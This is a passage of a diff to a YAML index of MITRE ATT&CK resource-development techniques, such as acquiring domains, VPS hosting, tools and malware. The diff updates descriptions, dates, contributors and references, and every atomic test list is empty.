         description: 'Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting
           Command & Control in the Cloud. Retrieved May 27, 2022.'
         url: https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/
+      - source_name: Netcraft SendGrid 2024
+        description: Graham Edgecombe. (2024, February 7). Phishception – SendGrid
+          is abused to host phishing attacks impersonating itself. Retrieved October
+          15, 2024.
+        url: https://www.netcraft.com/blog/popular-email-platform-used-to-impersonate-itself/
       - source_name: MSTIC Nobelium Oct 2021
         description: Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM
           targeting delegated administrative privileges to facilitate broader attacks.
@@ -52136,9 +52808,8 @@ resource-development:
         url: https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1586.002:
     technique:
@@ -52189,11 +52860,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.001:
     technique:
-      modified: '2023-04-11T23:22:49.534Z'
+      modified: '2024-10-16T20:13:40.501Z'
       name: Upload Malware
       description: |-
         Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
@@ -52206,7 +52876,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Kobi Haimovich, CardinalOps
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.
@@ -52241,22 +52911,25 @@ resource-development:
         url: https://blog.talosintelligence.com/ipfs-abuse/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.001:
     technique:
-      modified: '2024-04-13T14:03:04.511Z'
+      modified: '2024-09-25T15:26:00.047Z'
       name: Domains
       description: |-
         Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
 
-        Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
+        Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
+
+        Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
 
         Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
 
         Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
+
+        In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
@@ -52277,7 +52950,7 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Domain Name: Passive DNS'
       - 'Domain Name: Domain Registration'
@@ -52316,6 +52989,10 @@ resource-development:
         description: 'FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE
           OPERATIONS?. Retrieved August 19, 2015.'
         url: https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
+      - source_name: Invictus IR DangerDev 2024
+        description: Invictus Incident Response. (2024, January 31). The curious case
+          of DangerDev@protonmail.me. Retrieved March 19, 2024.
+        url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
       - source_name: Domain_Steal_CC
         description: Krebs, B. (2018, November 13). That Domain You Forgot to Renew?
           Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019.
@@ -52371,7 +53048,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.002:
     technique:
@@ -52429,7 +53105,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.004:
     technique:
@@ -52509,7 +53184,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.002:
     technique:
@@ -52569,7 +53243,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.001:
     technique:
@@ -52591,7 +53264,7 @@ resource-development:
         description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
           SunshopFireEye. Retrieved March 6, 2017.'
         url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:15:52.805Z'
       name: Malware
       description: |-
         Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
@@ -52610,42 +53283,10 @@ resource-development:
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
       - 'Malware Repository: Malware Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1583.003:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
-      type: attack-pattern
-      created: '2020-10-01T00:44:23.935Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1583.003
-        url: https://attack.mitre.org/techniques/T1583/003
-      - source_name: TrendmicroHideoutsLease
-        description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
-          Bulletproof Hosting Services. Retrieved March 6, 2017.'
-        url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
-      - source_name: ThreatConnect Infrastructure Dec 2020
-        url: https://threatconnect.com/blog/infrastructure-research-hunting/
-        description: 'ThreatConnect. (2020, December 15). Infrastructure Research
-          and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      - source_name: Mandiant SCANdalous Jul 2020
-        url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
-        description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
-          Using Network Scan Data and Automation). Retrieved October 12, 2021.
-      - source_name: Koczwara Beacon Hunting Sep 2021
-        url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
-        description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
-          Shodan. Retrieved October 12, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T13:22:11.113Z'
       name: Virtual Private Server
       description: |-
         Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
@@ -52654,22 +53295,53 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       - 'Internet Scan: Response Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
+      created: '2020-10-01T00:44:23.935Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1583/003
+        external_id: T1583.003
+      - source_name: Koczwara Beacon Hunting Sep 2021
+        description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
+          Shodan. Retrieved October 12, 2021.
+        url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
+      - source_name: TrendmicroHideoutsLease
+        description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
+          Bulletproof Hosting Services. Retrieved March 6, 2017.'
+        url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
+      - source_name: Mandiant SCANdalous Jul 2020
+        description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
+          Using Network Scan Data and Automation). Retrieved October 12, 2021.
+        url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
+      - source_name: ThreatConnect Infrastructure Dec 2020
+        description: 'ThreatConnect. (2020, December 15). Infrastructure Research
+          and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
+        url: https://threatconnect.com/blog/infrastructure-research-hunting/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1584:
     technique:
-      modified: '2024-03-28T03:53:28.299Z'
+      modified: '2024-10-16T20:06:03.570Z'
       name: Compromise Infrastructure
       description: |-
         Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
@@ -52683,7 +53355,7 @@ resource-development:
       x_mitre_contributors:
       - Jeremy Galloway
       - Shailesh Tiwary (Indian Army)
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: "Consider monitoring for anomalous changes to domain registrant
         information and/or domain resolution information that may indicate the compromise
@@ -52770,11 +53442,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1586:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T01:08:56.774Z'
       name: Compromise Accounts
       description: "Adversaries may compromise accounts with services that can be
         used during targeting. For operations incorporating social engineering, the
@@ -52834,7 +53505,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.005:
     technique:
@@ -52876,7 +53546,7 @@ resource-development:
         servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal,
         adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566)
         or Distributed Denial of Service (DDoS).'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T15:55:58.319Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Botnet
       x_mitre_detection: Much of this activity will take place outside the visibility
@@ -52891,7 +53561,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608:
     technique:
@@ -52982,11 +53651,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.005:
     technique:
-      modified: '2024-04-13T14:03:24.673Z'
+      modified: '2024-10-16T20:09:41.391Z'
       name: Link Target
       description: "Adversaries may put in place resources that are referenced by
         a link that can be used during targeting. An adversary may rely upon a user
@@ -53019,15 +53687,16 @@ resource-development:
         to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope
         Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect)
         In addition, adversaries may serve a variety of malicious links through uniquely
-        generated URIs/URLs.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI
-        Use)(Citation: URI Unique) Finally, adversaries may take advantage of the
-        decentralized nature of the InterPlanetary File System (IPFS) to host link
-        targets that are difficult to remove.(Citation: Talos IPFS 2022)"
+        generated URIs/URLs (including one-time, single use links).(Citation: iOS
+        URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally,
+        adversaries may take advantage of the decentralized nature of the InterPlanetary
+        File System (IPFS) to host link targets that are difficult to remove.(Citation:
+        Talos IPFS 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Hen Porcilan
       - Diyar Saadi Ali
       - Nikola Kovac
@@ -53111,7 +53780,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.006:
     technique:
@@ -53165,7 +53833,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.003:
     technique:
@@ -53216,36 +53883,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - SOCCRATES
-      - Mnemonic AS
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
-      type: attack-pattern
-      created: '2020-10-01T02:08:33.977Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588.002
-        url: https://attack.mitre.org/techniques/T1588/002
-      - source_name: Recorded Future Beacon 2019
-        url: https://www.recordedfuture.com/identifying-cobalt-strike-servers/
-        description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
-          Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.'
-      - source_name: Analyzing CS Dec 2020
-        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
-        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
-          Fun and Profit. Retrieved October 12, 2021.
-      modified: '2021-10-17T16:17:55.499Z'
+      modified: '2024-09-16T16:20:16.431Z'
       name: Tool
       description: |-
         Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
@@ -53254,21 +53895,47 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - SOCCRATES
+      - Mnemonic AS
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
+      created: '2020-10-01T02:08:33.977Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588/002
+        external_id: T1588.002
+      - source_name: Analyzing CS Dec 2020
+        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+          Fun and Profit. Retrieved October 12, 2021.
+        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+      - source_name: Recorded Future Beacon 2019
+        description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
+          Future Identified Rogue Cobalt Strike Servers. Retrieved September 16, 2024.'
+        url: https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1584.006:
     technique:
-      modified: '2023-04-12T20:19:21.620Z'
+      modified: '2024-10-15T16:44:09.114Z'
       name: Web Services
       description: 'Adversaries may compromise access to third-party web services that
         can be used during targeting. A variety of popular websites exist for legitimate
@@ -53314,17 +53981,16 @@ resource-development:
         external_id: T1584.006
       - source_name: Recorded Future Turla Infra 2020
         description: 'Insikt Group. (2020, March 12). Swallowing the Snake’s Tail:
-          Tracking Turla Infrastructure. Retrieved October 20, 2020.'
-        url: https://www.recordedfuture.com/turla-apt-infrastructure/
+          Tracking Turla Infrastructure. Retrieved September 16, 2024.'
+        url: https://www.recordedfuture.com/research/turla-apt-infrastructure
       - source_name: ThreatConnect Infrastructure Dec 2020
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.001:
     technique:
@@ -53350,7 +54016,7 @@ resource-development:
         description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
           March 6, 2017.
         url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:37:34.563Z'
       name: Social Media Accounts
       description: "Adversaries may create and cultivate social media accounts that
         can be used during targeting. Adversaries can create social media accounts
@@ -53382,8 +54048,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Persona: Social Media'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.004:
     technique:
@@ -53410,7 +54074,7 @@ resource-development:
         url: https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims
         description: Stephen Sims. (2017, April 30). Microsoft Patch Analysis for
           Exploitation. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:07:53.803Z'
       name: Exploits
       description: |-
         Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
@@ -53434,8 +54098,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1608.003:
     technique:
@@ -53461,7 +54123,7 @@ resource-development:
         url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
         description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
           Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:47:46.409Z'
       name: Install Digital Certificate
       description: "Adversaries may install SSL/TLS certificates that can be used
         during targeting. SSL/TLS certificates are files that can be installed on
@@ -53495,8 +54157,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.002:
     technique:
@@ -53544,7 +54204,7 @@ resource-development:
         Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
 
         By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019)  Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T21:22:13.578Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: DNS Server
       x_mitre_detection: |-
@@ -53560,7 +54220,6 @@ resource-development:
       - 'Domain Name: Passive DNS'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585:
     technique:
@@ -53619,54 +54278,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
-      type: attack-pattern
-      created: '2020-10-01T01:56:24.776Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588
-        url: https://attack.mitre.org/techniques/T1588
-      - source_name: NationsBuying
-        description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
-          Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
-        url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
-      - url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
-        description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
-          Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
-          Human Rights Defender. Retrieved December 12, 2016.'
-        source_name: PegasusCitizenLab
-      - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
-          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
-        source_name: DiginotarCompromise
-        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
-      - source_name: FireEyeSupplyChain
-        description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
